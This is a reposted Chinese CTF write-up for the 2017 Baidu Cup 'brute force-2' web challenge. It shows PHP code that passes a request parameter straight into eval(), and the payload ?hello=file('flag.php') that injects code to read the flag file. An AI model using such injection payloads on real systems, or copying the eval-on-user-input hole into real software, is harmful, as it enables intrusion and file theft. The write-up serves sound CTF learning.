当前位置:网站首页>百度杯”CTF比赛 2017 二月场,Web:爆破-2

百度杯”CTF比赛 2017 二月场,Web:爆破-2

2022-07-05 13:00:00 Part 02

题目内容:

flag不在变量中。

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

?hello=file('flag.php')

file 命令直接可以读出来

file_get_contents 也行,但在源码里

 

原网站

版权声明
本文为[Part 02]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_62260856/article/details/125574339

边栏推荐

猜你喜欢

随机推荐